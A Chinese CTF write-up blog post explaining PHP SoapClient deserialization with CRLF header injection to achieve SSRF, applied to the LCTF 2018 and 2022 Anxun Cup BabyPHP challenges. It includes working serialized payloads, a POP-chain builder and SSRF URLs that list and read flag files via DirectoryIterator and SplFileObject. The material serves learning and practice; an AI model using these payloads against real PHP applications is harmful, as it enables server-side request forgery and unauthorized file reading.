从2022安洵杯[babyPHP]看Soap+CLRF造成SSRF漏洞

已于 2023-09-26 16:40:47 修改
阅读量2.5k 收藏 1
点赞数 2
文章标签: php web安全
于 2022-11-28 22:09:01 首次发布
Aiwin
本文链接:https://blog.csdn.net/weixin_53090346/article/details/128085938
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

目录

前言

一、PHP SOAP

二、漏洞成因

三、 题目知识准备

1、PHP Session反序列化

         2、题目相关函数

四、[LCTF 2018]bestphp's revenge

五、2022安洵杯 BabyPHP

前言

提示:这里可以添加本文要记录的大概内容:

今天有一位学弟在安洵杯结束后,发了安洵杯babyPHP的题目跟我探讨,自己看了一下,发现也确实没有碰到过,但是在网上搜到了相应的CTF例题,所以研究了一下,写个总结。

提示:以下是本篇文章正文内容,下面案例可供参考

一、PHP SOAP

SOAP是WebService三要素之一,SOAP称为简单对象访问协议,是连接Web服务或客户端和Web服务器之间的接口。采用的是XML作为数据传送格式,HTTP为底层通讯协议。

在PHP中,SOAP扩展有几个类,本次用到的主要是SoapClient类,解释如下:

public SoapClient :: SoapClient (mixed $wsdl [,array $options ])

第一个参数指明是否为wsdl模式,NULL为非wsdl模式,非wsdl模式下进行反序列化的时候会对第二个参数中的url和locaition进行远程soap请求。

第二个参数是数组,表示soap请求的一些参数和属性。

在PHP中,要使用SoapClient,需要在php.ini中开启PHP扩展

                

二、漏洞成因

1、在原生的PHP SoapClient类中,存在__call魔术方法,当调用不存在的方法时候会自动调用此方法,对location中的URL进行请求,先来看一下。

<?php
$target = "http://192.168.23.137:5555";
$attack = new SoapClient(null,array('location' => $target,
    'user_agent' => "aiwin",
    'uri' => "123"));
$payload = serialize($attack);
echo $payload;

$c=unserialize($payload);
$c->not_function();

 可以看到Soap利用HTTP协议传输,传输的数据格式的XML。

 重要的是可以看到发送的请求中,uri参数和user_agent参数可控,可以自定义发送soap请求的值,在HTTP请求中,我们知道每一个头部属性值都是通过\r\n换行进行间隔,那么原生Soap就可以通过user_agent通过注入\r\n恶意的换行注入Cookie或者一些其它属性代码,造成CRLF注入。

<?php
$target = "http://192.168.23.137:5555";
$attack = new SoapClient(null,array('location' => $target,
    'user_agent' => "aiwin\r\nCookie: PHPSESSID=123456\r\n",
    'uri' => "123"));
$payload = serialize($attack);
echo $payload;

$c=unserialize($payload);
$c->not_function();

 可以看到,恶意注入了Cookie会话,CRLF确实可行。

三、 题目知识准备

1、PHP Session反序列化

在php session中,存在一部分参数规定关于session的操作。

 session.save_handler 表示session的保存形式是file。

 session.save_path 表示session的保存路径,一般linux在/tmp/sess_id。

 session.serialize_handler 表示session序列化的存储器,默认的php,还有php_serialize、php_binary。

session.upload_progress_cleanup表示读取了数据后,会立即清除掉session的进度信息。

session.upload_progress_enable表示upload_progress功能启动,即浏览器向服务器上传文件时,php会把此次文件上传的详细信息存储在session中。

session.upload_progress中的prefix 和 name 两项用来设置进度信息在session中存储的变量名/键名。

session.use_strict_mode中的值为off,表示Cookie中的sessionid可控。

 关于三种处理器的区别:

处理器为php时,session的内容是键名+竖线+经过序列化函数后反序列化的值,如name|s:5:"aiwin";

处理器为php_serialize  内容是ASCII字符+键名+序列化函数后反序列化的值,如a:1:{s:4:"name";s:5:"aiwin";}

处理器为php_binary 内容是经过序列化后反序列化的数组,如 二进制字符names:5:"aiwin";

那么当session反序列化和序列化的时候使用不同的引擎,即可触发错误,比如,$_SESSION['test'] = '|aiwin',用php_serialize得到的内容为,a:1:{s:4:”name”;s:6:”|aiwin”;},

使用php引擎时,|是分隔符,所以aiwin被当成了值传入了$_SESSION。

2、题目相关函数

(1)call_user_func($value1,$value2)

把第一个参数作为回调函数调用。

<?php
class test{
    static function hello(){
        echo "hello!\n";
    }
}
$test=new test();
call_user_func(array($test,'hello'));


输出:hello

 (2)extract函数:

从数组中将变量导入到当前的符号表。

该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。

<?php
$a = "Original";
$test = array("a" => "test", "b" => "Aiwin");

extract($test);

echo "$a=$a"
?>


输出:test=test

 (3)PHP的一些原生类

DirectoryIteratory原生类,可以遍历目录,也可以联合glob://协议一起用,可以使用通配符

<?php

$dir = new DirectoryIterator(dirname(__FILE__));
foreach ($dir as $file){
   echo $dir;
    }


输出当前目录下的文件

GlobIterator原生类,与上面类似,不同的是自带了glob协议。 

SplFileObject原生类,可以用于读取文件的内容,一般只读取一行,全部读取需要遍历

<?php
$context = new SplFileObject('flag');
echo $context;


输出:flag的文件内容

还有一些原生类这里没用到,就不进行介绍了。 

以下例题注意点:自身new SoapClient的PHP版本要为7的版本,开始用的8的版本发现不行,因为PHP8进行new SoapClient生成的东西会比7多很多属性值。

四、[LCTF 2018]bestphp's revenge

题目源码:

<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);
?>

题目说明了flag在flag.php中,利用上面的知识进行做题,首先需要更改handler的引擎为php_serialize,这里存在call_user_func,PHP版本号为7.0+,可以通过call_user_func调用session_start()更好引擎,然后传入构造的new SoapClient的序列化值,然后再通过变量覆盖掉$b,使SoapClient访问不存在的方法welcome_to_the_lctf2018从而访问location中的flag.php,返回flag的值。

<?php
$target='http://127.0.0.1/flag.php';
$b = new SoapClient(null,array('location' => $target,
    'user_agent' => "aiwin\r\nCookie:PHPSESSID=123456\r\n",
    'uri' => "http://127.0.0.1/"));

$se = serialize($b);
echo "|".urlencode($se);

 

这里通过变量覆盖,覆盖掉b的值,b=call_user_func后call_user_func($b,$a)就变成了call_user_func("call_user_func",array("SoapClient","Welcome_to_the_ctf..."))使SoapClient调用了call_user_func。

 

这里需要|的原因是因为之前所说的引擎不同造成的漏洞,使用php_serialize引擎序列化后,程序加载session的时候,使用的是php引擎处理,|后的内容就是键值,这样就成功序列化了一个SoapClient对象。 

五、2022安洵杯 BabyPHP

<?php
//something in flag.php

class A
{
    public $a;
    public $b;

    public function __wakeup()
    {
        $this->a = "babyhacker";
    }

    public function __invoke()
    {
        if (isset($this->a) && $this->a == md5($this->a)) {
            $this->b->uwant();
        }
    }
}

class B
{
    public $a;
    public $b;
    public $k;

    function __destruct()
    {
        $this->b = $this->k;
        die($this->a);
    }
}

class C
{
    public $a;
    public $c;

    public function __toString()
    {
        $cc = $this->c;
        return $cc();
    }
    public function uwant()
    {
        if ($this->a == "phpinfo") {
            phpinfo();
        } else {
            call_user_func(array(reset($_SESSION), $this->a));
        }
    }
}


if (isset($_GET['d0g3'])) {
    ini_set($_GET['baby'], $_GET['d0g3']);
    session_start();
    $_SESSION['sess'] = $_POST['sess'];
}
else{
    session_start();
    if (isset($_POST["pop"])) {
        unserialize($_POST["pop"]);
    }
}
var_dump($_SESSION);
highlight_file(__FILE__);

 有一段反序列化,Pop链为B::__toString->A::__invoke()->C::uwant(),绕过A类直接增加A的个数即可,弱相等,绕过md5可以使用科学计数法。

<?php
class A{
public $a='0e215962017';
public $b;
}
class B{
public $a;
public $b;
public $k;
}
class C{
public $a='phpinfo';
public $c;
}
$a=new B;
$a->a=new C;
$a->a->c=new A;
$a->a->c->b=new C;
echo serialize($a);

 传入pop可以查看到phpinfo()

 其实知道是SoapClient造成SSRF,不看phpinfo()也可以。

提示有flag.php,查看flag.php的代码:

<?php
session_start();
highlight_file(__FILE__);
//flag在根目录下
if ($_SERVER["REMOTE_ADDR"] === "127.0.0.1") {
    $f1ag = implode(array(new $_GET['a']($_GET['b'])));
    $_SESSION["F1AG"] = $f1ag;
} else {
    echo "only localhost!!";
}
only localhost!!

这里提示flag在根目录下, $f1ag = implode(array(new $_GET['a']($_GET['b'])));使new出来的原生类能够拼接起来,所以可以通过SSRF访问flag.php并且传入a和b参数的属性为DirectoryIterator原生类联合glob先读取flag的文件名。

$target = 'http://127.0.0.1/flag.php?a=DirectoryIterator&b=glob:///f*';
$b = new SoapClient(null, array('location' => $target,
    'user_agent' => "aiwin1\r\nCookie:PHPSESSID=aiwin1\r\n",
    'uri' => "http://127.0.0.1/"));
$a = serialize($b);
echo "|" . urlencode($a);

解题和上面一样,先更改引擎,这里有ini_set(),可以直接利用更改引擎。

 然后传入反序列的Pop链,使用链条进入call_user_func,触发SoapClient的__call方法

知道了flag的文件名是f111llllllllaagg,然后再通过SplFileObject原生类读取flag。

$target = 'http://127.0.0.1/flag.php?a=SplFileObject&b=/f1111llllllaagg';
$b = new SoapClient(null, array('location' => $target,
    'user_agent' => "aiwin1\r\nCookie:PHPSESSID=aiwin1\r\n",
    'uri' => "http://127.0.0.1/"));
$a = serialize($b);
echo "|" . urlencode($a);

 按照相等步骤传入即可读到flag

总结

漏洞理解起来不算很难,但是从看例题然后解这道安洵杯,还是花费了好多时间,但是也收获了不少,长了不少知识。

M03-Aiwin
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
自我认为挺全面的【Web Service渗透测试总结】
HBohan的博客
02-18 727
Web Service是一个平台独立的、低耦合的、自包含的、基于可编程的Web的应用程序,可使用开放的XML(标准通用标记语言下的一个子集)标准来描述、发布、发现、协调和配置这些应用程序,用于开发分布式的交互操作的应用程序。
php竞赛,京津冀大学生竞赛:babyphp
weixin_39884738的博客
03-12 195
京津冀大学生竞赛:babyphp比赛的时候没作出来,回来之后一会就作出来了,难受。。。仍是基本功不扎实,都不记得__invoke怎么触发的了php放上源码函数error_reporting(1);class Read {public $var;public function file_get($value){$text = base64_encode(file_get_contents($valu...
NSSCTF刷题记录
kindyyy的博客
03-13 784
NSSctf的刷题记录,有错误欢迎指正
web service渗透测试
weixin_41489908的博客
10-30 2394
​在街上看见一个人像你,我瞬间特别紧张,渴望是你,又害怕是你,直到看清不是你,我庆幸不是你,有遗憾不是你。。。 ---- 网易云热评 一、什么是Web Service Web Service是一个平台独立的,低耦合的,自包含的、基于可编程的web的应用程序,可使用开放的XML(标准通用标记语言下的一个子集)标准来描述、发布、发现、协调和配置这些应用程序,用于开发分布式的交互操作的应用程序。 Web Service技术, 能使得运行在不同机器上的不同应用无须借助附加的、专门的第三方软件或硬件,..
软件测试笔记——19.测试方案和测试用例的区别
程序员二黑
12-05 2743
前言 在测试的面试过程中,经常会有面试官问“测试方案和测试用例的区别”。两者都是测试的产出,想要区别两者可以从下面的这些方面着手。 测试方案的定义 测试方案给出了我们必须测试的内容。测试场景就像一个抽象的测试用例。 测试方案回答“要测试什么”。 假设我们需要测试应用程序登录页面的功能。登录页面功能的测试方案如下: 测试方案示例:验证登录功能 测试用例的定义 测试用例是一个测试方案的可以是正向的或者是逆向的可执行步骤的集合,包含一组前置条件、测试数据、预期结果、后置条件和实际结果。 测试用例回答“如何测.
ember-cli-breaklines:Ember CLI 插件。 返回一个换行符转换成的 HTML SafeString . 支持 CLRF、CL 和 RF(*nix、Mac 和 Windows)
06-03
从 ember-cli 装: ember install ember-cli-breaklines 使用 ember-cli 0.1.5 - 0.2.2 时: ember install:addon ember-cli-breaklines 除此以外: git clone这个仓库 npm install bower install 笔记 这...
PIC18系列单片机指令中文讲解
03-01
PIC18系列的汇编指令讲解,看着这本手册,就可以翻译你的汇编语言了,可以很好的了解PIC18单片机的工作过程
PIC单片机的清零指令详解
07-13
指令格式:CLRF f实例:CLRF TMRO;对TMRO清零说明:在PIC系列8位单片机中,常用符号F(或f)代表片内的各种寄程器和F的序号地址。F取值按PIC系列不同型号而不同,一般为Ox00~Ox1F/7F/FF。TMRO代表定时器/计数器TMRO...
PIC中档单片机汇编指令详解
08-03
首先,我们来看NOP指令,全称为No Operation,即空操作指令。NOP指令在执行时不会有任何实际的操作,只是简单地消耗了一个指令周期,常用于程序中的延时或者占位。例如,在需要等待某个硬件操作完成或者调整程序流程...
PIC指令详解.pdf
09-22
CLRF 指令:清零数据寄存器 * 语法形式:CLRF f * 操作数:f 为数据寄存器的低 7 位地址(0x00~0x7F) * 执行时间:一个指令周期 * 执行过程:0x00→f * 状态标志影响:Z * 说明:该指令对数据寄存器清零,并置位 0...
针对SOAP的渗透测试与防护
02-25
简单对象访问协议(SOAP)是连接或Web服务或客户端和Web服务之间的接口。SOAP通过应用层协议(如HTTP,SMTP或甚至TCP)进行操作,用于消息传输。图1SOAP操作它是基于xml语言开发的,它使用Web服务描述语言(WSDL)来生成Web服务之间的接口。如果客户端或用户的独立应用程序想要与Web服务连接,则它需要由应用程序生成的服务端点接口(SEI)。这些接口WSDL和SEI是使用自动化工具或手动生成的,它们具有平台无关性。通用描述,发现和集成(UDDI)是Web服务可以发布关于其服务的一个目录,用户可以提交他们的查询。一个简单的SOAP消息包含:Envelope:标识XML文档,
DoYouHaoBaby PHP开发框架 v2.5.2.rar
08-30
DoYouHaoBaby(全名:The DoYouHaoBaby PHP Framework)是一个极具美学价值的PHP开发框架,从代码、注释、文 档以及系统工具的用户界面均追求干净、整洁而高效。DoYouHaoBaby 具备了大量丰富的特性: 包括MVC, ActiveRecord, 国际化语言包, 缓存组件, 分布式服务器部署, 领域驱动设计, 模式扩展, 模板引擎,RBAC权限扩展和测试等等。她能够快速地构建一个企业级应用。 程序功能: 1.PHP autoload自动载入 2.多元化的URL模式 3.丰富的数据库查询语言 4.内置Code和Tag两种风格迥异的模板引擎 5.多语言支持 6.分布式数据库特性支持 7.内置常用的缓存机制 8.AJAX支持 9.更多功能等待你的发掘... 装: 1.将DoYouHaoBaby 2.5 压缩包解压至一个空文件夹。 2.DoYouHaoBaby不需要进行任何特殊的装,只需要直接部署即可。
2022babyphp
东隅的博客
11-28 1058
这个题没打出来有点可惜,感觉做的都差不多了,不过有些地方确实没理解,还是理解不到位先来看序列化,这个序列化是不难的,不过有一个小坑,我们先理一遍顺序flag.php这里最后肯定要调用C类的uwant函数,可以由A类的__invoke()方法触发,A类的__invoke()方法由C类的__toString()方法触发,这里有一个小坑,我当时一直以为这个tostring是A类的 $this->a = "babyhacker";触发的,结果一直没跑通,后来看没用到B类,尝试用B的die($this->a);
【技术分享】针对SOAP的渗透测试与防护
baynk的博客
04-12 2514
本文翻译自:https://blog.securelayer7.net/owasp-top-10-penetration-testing-soap-application-mitigation/ SOAP概述 简单对象访问协议(SOAP)是连接或Web服务或客户端和Web服务之间的接口。SOAP通过应用层协议(如HTTP,SMTP或甚至TCP)进行操作,用于消息传输。 图1 SOAP操...
UNCTF2022-Web
v2ish1yan的博客
11-21 858
unctf2022的所有webwp
jarvis OJ web babyphp
qq_43677324的博客
04-02 1011
babyphp 考完二级后我又要回归web狗了 今天做到一道web题 上题: http://web.jarvisoj.com:32798/ 进入后: 发现应该有git泄露 因此我们使用githack进行获得源码 打开cmd 输入:python2 GitHack.py http://web.jarvisoj.com:32798/.git/ #这里的python2是我设置的用于区分python3 即这...
git源码泄露及php注入——【61dctf】babyphp writeup
Ve99tr’s Blog
09-04 1340
题目链接:http://web.jarvisoj.com:32798/ 描述 进入页面后点击导航栏的About选项 关键点:GIT git源码泄露 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。 摘自:https://www.freebuf.com/sectool/66096.html 关于g...
61dctf writeup
quedgee
10-29 2760
admin打开页面发现。。。。就一个Hello World= =,查看源代码也无果,那么抓个包吧= = emmmm,发现什么也没有,那么就robots.txt看看吧,发现果然有东西 web.jarvisoj.com:32792/robots.txt 访问这个后发现。。。。flag{hello guest}。。。。嗯。。。被骗了,提交这个没有用 那么在这个页面抓个包,再改一次admin
soap协议版本引发的血案
alleyz
11-30 1511
    利用HTTP+POST发送基于SOAP协议的XML,总是报错 Transport level information does not match with SOAP Message namespace URI;看上去是找不到命名空间,穷尽各种办法,不能解决。然后重新看了一遍SOAP协议规范也未见成果。最后,意外中找到了SOAP的英文说明文档,其中描述: Using SOAP Name...
matlab clrf
最新发布
03-19
CLRF是MATLAB中的一个函数,用于清除命令行窗口中的文本内容。 当你在MATLAB命令行窗口中输入`clc`命令时,它会清除之前在窗口中显示的所有文本,使窗口变为空白。这对于清理命令行窗口中的杂乱输出或者开始一个新...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值